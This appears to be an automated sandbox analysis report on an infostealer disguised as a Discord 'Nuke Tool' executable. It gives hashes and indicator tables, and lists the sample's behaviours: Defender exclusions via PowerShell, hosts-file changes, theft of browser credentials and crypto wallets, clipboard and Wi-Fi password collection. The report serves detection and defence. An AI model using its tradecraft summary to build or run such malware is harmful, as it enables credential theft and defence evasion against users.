eacbb5f16c8e1315bfa69d3bb0ce318cf246cff642bbde43e6263fd34e0c399b

Resubmissions

12-12-2024 15:34

241212-szwtpaykhv 10

12-12-2024 15:12

12-12-2024 03:03

11-12-2024 08:54

08-12-2024 15:39

Analysis

max time kernel
827s
max time network
830s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11-12-2024 08:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Nuke Tool discord-gg-kasyno.exe
Size

42.5MB
MD5

51817b9dcd9c193c3358f6b179d268d1
SHA1

48711e49dd33723c12a2ba925d228b99ab297274
SHA256

eacbb5f16c8e1315bfa69d3bb0ce318cf246cff642bbde43e6263fd34e0c399b
SHA512

6a5b1ac87137fe7ced1c902ee331d2eaf38a6d042b836190abd1a6a9f3826e1141c86ab64557992e7c388278f81f8abd04e60027e790cad8713c374f920f6957
SSDEEP

786432:gDEDi+G9pN2TxKFLyPnoVIXkXVGRG7dcuZaqdior4XXpf6q3loaU/fsc+KkeAhev:ggDi+RoFLyPno/AydcucZfb3KnqKUhev

Score

8^/10

collection credential_access defense_evasion discovery execution persistence phishing privilege_escalation pyinstaller spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
864	powershell.exe
1864	powershell.exe
2424	powershell.exe
3052	powershell.exe
1932	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Nuke Tool discord-gg-kasyno.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing
A potential corporate email address has been identified in the URL: water.css@2
phishing

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4636	cmd.exe
4772	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
4376	bound.exe
1376	bound.exe
4952	rar.exe

Loads dropped DLL 30 IoCs

pid	Process
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
3752	Nuke Tool discord-gg-kasyno.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe
1376	bound.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2044	tasklist.exe
1680	tasklist.exe
3368	tasklist.exe
4368	tasklist.exe

UPX packed file 61 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002aac8-22.dat	upx
behavioral1/memory/3752-26-0x00007FFDAFC20000-0x00007FFDB0086000-memory.dmp	upx
behavioral1/files/0x001900000002aab7-28.dat	upx
behavioral1/files/0x001900000002aac5-30.dat	upx
behavioral1/memory/3752-31-0x00007FFDB4630000-0x00007FFDB4654000-memory.dmp	upx
behavioral1/memory/3752-33-0x00007FFDB9AB0000-0x00007FFDB9ABF000-memory.dmp	upx
behavioral1/files/0x001900000002aac4-36.dat	upx
behavioral1/files/0x001900000002aac7-37.dat	upx
behavioral1/files/0x001900000002aabb-47.dat	upx
behavioral1/files/0x001900000002aabe-50.dat	upx
behavioral1/files/0x001900000002aabd-49.dat	upx
behavioral1/files/0x001900000002aabc-48.dat	upx
behavioral1/files/0x001900000002aaba-46.dat	upx
behavioral1/files/0x001900000002aab9-45.dat	upx
behavioral1/files/0x001900000002aab8-44.dat	upx
behavioral1/files/0x001900000002aab6-43.dat	upx
behavioral1/files/0x001900000002aad1-42.dat	upx
behavioral1/files/0x001900000002aace-41.dat	upx
behavioral1/files/0x001900000002aacd-40.dat	upx
behavioral1/memory/3752-56-0x00007FFDB4600000-0x00007FFDB462C000-memory.dmp	upx
behavioral1/memory/3752-58-0x00007FFDB5970000-0x00007FFDB5988000-memory.dmp	upx
behavioral1/memory/3752-60-0x00007FFDB5810000-0x00007FFDB582F000-memory.dmp	upx
behavioral1/memory/3752-62-0x00007FFDB0260000-0x00007FFDB03DA000-memory.dmp	upx
behavioral1/memory/3752-64-0x00007FFDB45E0000-0x00007FFDB45F9000-memory.dmp	upx
behavioral1/memory/3752-66-0x00007FFDB9A10000-0x00007FFDB9A1D000-memory.dmp	upx
behavioral1/memory/3752-68-0x00007FFDB3360000-0x00007FFDB338E000-memory.dmp	upx
behavioral1/memory/3752-73-0x00007FFDB00F0000-0x00007FFDB01A8000-memory.dmp	upx
behavioral1/memory/3752-76-0x00007FFDB4630000-0x00007FFDB4654000-memory.dmp	upx
behavioral1/memory/3752-75-0x00007FFDAF8A0000-0x00007FFDAFC19000-memory.dmp	upx
behavioral1/memory/3752-72-0x00007FFDAFC20000-0x00007FFDB0086000-memory.dmp	upx
behavioral1/memory/3752-79-0x00007FFDB3340000-0x00007FFDB3355000-memory.dmp	upx
behavioral1/memory/3752-78-0x00007FFDB9AB0000-0x00007FFDB9ABF000-memory.dmp	upx
behavioral1/memory/3752-82-0x00007FFDB9830000-0x00007FFDB983D000-memory.dmp	upx
behavioral1/memory/3752-81-0x00007FFDB4600000-0x00007FFDB462C000-memory.dmp	upx
behavioral1/memory/3752-102-0x00007FFD98190000-0x00007FFD982A8000-memory.dmp	upx
behavioral1/memory/3752-143-0x00007FFDB5810000-0x00007FFDB582F000-memory.dmp	upx
behavioral1/memory/3752-253-0x00007FFDB0260000-0x00007FFDB03DA000-memory.dmp	upx
behavioral1/memory/3752-285-0x00007FFDB45E0000-0x00007FFDB45F9000-memory.dmp	upx
behavioral1/memory/3752-339-0x00007FFDB3360000-0x00007FFDB338E000-memory.dmp	upx
behavioral1/memory/3752-342-0x00007FFDB00F0000-0x00007FFDB01A8000-memory.dmp	upx
behavioral1/memory/3752-362-0x00007FFDAF8A0000-0x00007FFDAFC19000-memory.dmp	upx
behavioral1/memory/3752-369-0x00007FFDB0260000-0x00007FFDB03DA000-memory.dmp	upx
behavioral1/memory/3752-363-0x00007FFDAFC20000-0x00007FFDB0086000-memory.dmp	upx
behavioral1/memory/3752-378-0x00007FFDB9830000-0x00007FFDB983D000-memory.dmp	upx
behavioral1/memory/3752-368-0x00007FFDB5810000-0x00007FFDB582F000-memory.dmp	upx
behavioral1/memory/3752-364-0x00007FFDB4630000-0x00007FFDB4654000-memory.dmp	upx
behavioral1/memory/3752-379-0x00007FFDAFC20000-0x00007FFDB0086000-memory.dmp	upx
behavioral1/memory/3752-407-0x00007FFD98190000-0x00007FFD982A8000-memory.dmp	upx
behavioral1/memory/3752-406-0x00007FFDB9830000-0x00007FFDB983D000-memory.dmp	upx
behavioral1/memory/3752-405-0x00007FFDB3340000-0x00007FFDB3355000-memory.dmp	upx
behavioral1/memory/3752-404-0x00007FFDB00F0000-0x00007FFDB01A8000-memory.dmp	upx
behavioral1/memory/3752-403-0x00007FFDB3360000-0x00007FFDB338E000-memory.dmp	upx
behavioral1/memory/3752-402-0x00007FFDB9A10000-0x00007FFDB9A1D000-memory.dmp	upx
behavioral1/memory/3752-401-0x00007FFDB45E0000-0x00007FFDB45F9000-memory.dmp	upx
behavioral1/memory/3752-400-0x00007FFDB0260000-0x00007FFDB03DA000-memory.dmp	upx
behavioral1/memory/3752-399-0x00007FFDB5810000-0x00007FFDB582F000-memory.dmp	upx
behavioral1/memory/3752-398-0x00007FFDB5970000-0x00007FFDB5988000-memory.dmp	upx
behavioral1/memory/3752-397-0x00007FFDB4600000-0x00007FFDB462C000-memory.dmp	upx
behavioral1/memory/3752-396-0x00007FFDB9AB0000-0x00007FFDB9ABF000-memory.dmp	upx
behavioral1/memory/3752-395-0x00007FFDB4630000-0x00007FFDB4654000-memory.dmp	upx
behavioral1/memory/3752-394-0x00007FFDAF8A0000-0x00007FFDAFC19000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001c00000002aab3-113.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2560	cmd.exe
2948	netsh.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4536	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3140	systeminfo.exe

Modifies registry class 55 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = 00000000ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	firefox.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\NodeSlot = "11"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\MRUListEx = ffffffff	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	firefox.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Generic"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 = 14002e803accbfb42cdb4c42b0297fe99a87c6410000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "9"	firefox.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0 = 5e003100000000008b59964810004e4557464f4c7e310000460009000400efbe8b5989488b5996482e000000c5ab020000001b000000000000000000000000000000aaa585004e0065007700200066006f006c00640065007200000018000000	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	firefox.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	firefox.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\bound.exe_extracted.zip:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
1932	powershell.exe
864	powershell.exe
864	powershell.exe
1932	powershell.exe
1864	powershell.exe
1864	powershell.exe
1864	powershell.exe
4772	powershell.exe
4772	powershell.exe
2988	powershell.exe
2988	powershell.exe
2988	powershell.exe
4772	powershell.exe
2424	powershell.exe
2424	powershell.exe
4604	powershell.exe
4604	powershell.exe
3052	powershell.exe
3052	powershell.exe
2320	powershell.exe
2320	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1416	firefox.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	2044	tasklist.exe
Token: SeDebugPrivilege	1680	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3804	WMIC.exe
Token: SeSecurityPrivilege	3804	WMIC.exe
Token: SeTakeOwnershipPrivilege	3804	WMIC.exe
Token: SeLoadDriverPrivilege	3804	WMIC.exe
Token: SeSystemProfilePrivilege	3804	WMIC.exe
Token: SeSystemtimePrivilege	3804	WMIC.exe
Token: SeProfSingleProcessPrivilege	3804	WMIC.exe
Token: SeIncBasePriorityPrivilege	3804	WMIC.exe
Token: SeCreatePagefilePrivilege	3804	WMIC.exe
Token: SeBackupPrivilege	3804	WMIC.exe
Token: SeRestorePrivilege	3804	WMIC.exe
Token: SeShutdownPrivilege	3804	WMIC.exe
Token: SeDebugPrivilege	3804	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3804	WMIC.exe
Token: SeRemoteShutdownPrivilege	3804	WMIC.exe
Token: SeUndockPrivilege	3804	WMIC.exe
Token: SeManageVolumePrivilege	3804	WMIC.exe
Token: 33	3804	WMIC.exe
Token: 34	3804	WMIC.exe
Token: 35	3804	WMIC.exe
Token: 36	3804	WMIC.exe
Token: SeDebugPrivilege	3368	tasklist.exe
Token: SeDebugPrivilege	4772	powershell.exe
Token: SeIncreaseQuotaPrivilege	3804	WMIC.exe
Token: SeSecurityPrivilege	3804	WMIC.exe
Token: SeTakeOwnershipPrivilege	3804	WMIC.exe
Token: SeLoadDriverPrivilege	3804	WMIC.exe
Token: SeSystemProfilePrivilege	3804	WMIC.exe
Token: SeSystemtimePrivilege	3804	WMIC.exe
Token: SeProfSingleProcessPrivilege	3804	WMIC.exe
Token: SeIncBasePriorityPrivilege	3804	WMIC.exe
Token: SeCreatePagefilePrivilege	3804	WMIC.exe
Token: SeBackupPrivilege	3804	WMIC.exe
Token: SeRestorePrivilege	3804	WMIC.exe
Token: SeShutdownPrivilege	3804	WMIC.exe
Token: SeDebugPrivilege	3804	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3804	WMIC.exe
Token: SeRemoteShutdownPrivilege	3804	WMIC.exe
Token: SeUndockPrivilege	3804	WMIC.exe
Token: SeManageVolumePrivilege	3804	WMIC.exe
Token: 33	3804	WMIC.exe
Token: 34	3804	WMIC.exe
Token: 35	3804	WMIC.exe
Token: 36	3804	WMIC.exe
Token: SeDebugPrivilege	2988	powershell.exe
Token: SeDebugPrivilege	4368	tasklist.exe
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	4604	powershell.exe
Token: SeIncreaseQuotaPrivilege	1484	WMIC.exe
Token: SeSecurityPrivilege	1484	WMIC.exe
Token: SeTakeOwnershipPrivilege	1484	WMIC.exe
Token: SeLoadDriverPrivilege	1484	WMIC.exe
Token: SeSystemProfilePrivilege	1484	WMIC.exe
Token: SeSystemtimePrivilege	1484	WMIC.exe
Token: SeProfSingleProcessPrivilege	1484	WMIC.exe
Token: SeIncBasePriorityPrivilege	1484	WMIC.exe
Token: SeCreatePagefilePrivilege	1484	WMIC.exe
Token: SeBackupPrivilege	1484	WMIC.exe
Token: SeRestorePrivilege	1484	WMIC.exe

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
1416	firefox.exe
